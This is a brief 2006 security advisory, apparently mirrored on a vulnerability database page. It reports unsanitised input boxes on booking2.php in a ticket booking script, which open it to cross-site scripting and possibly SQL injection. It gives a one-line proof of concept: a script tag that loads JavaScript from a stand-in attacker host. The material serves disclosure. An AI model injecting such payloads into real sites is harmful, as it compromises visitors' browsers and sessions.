Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13070
HistoryJun 10, 2006 - 12:00 a.m.

mole.com.ua Ticket Booking Script - XSS

2006-06-1000:00:00
vulners.com
8
JSON

Ticket Booking Script

Homepage:
http://www.mole.com.ua

Effected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it
to a MySQL db. This can causes XSS examples as well as possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js&gt;&lt;/SCRIPT&gt; in any of the input boxes

JSON